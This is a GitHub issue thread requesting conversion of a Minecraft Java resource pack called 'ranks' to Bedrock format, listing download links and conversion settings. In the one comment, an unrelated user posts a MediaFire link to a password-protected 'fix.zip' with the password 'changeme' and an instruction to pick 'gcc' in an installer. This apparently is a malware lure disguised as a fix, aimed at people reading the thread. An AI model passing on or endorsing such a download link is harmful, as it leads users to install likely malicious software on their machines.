### ISSUE TITLE
[Pack]: ranks

### ISSUE THREAD

**Issue by D1aloO** [AZPixel-Team/Java2Bedrock#4536]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/brz5gq32g14jtteiycivf/generated-3.zip?rlkey=uazvbfvcapkrsasuekqwk6a02&st=5jrm39vh&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/tknhailp9p9q990mafc8c/geyser_resources.mcpack?rlkey=nfahfdjja8djsf3727gu8b2de&st=hocq0nbe&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Font Conversion

true

### Armor Conversion

None

### Meg3 Fix

None

### Sounds Conversion

None

### Bow Conversion

None

### Shield Conversion

None

### Block Conversion

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
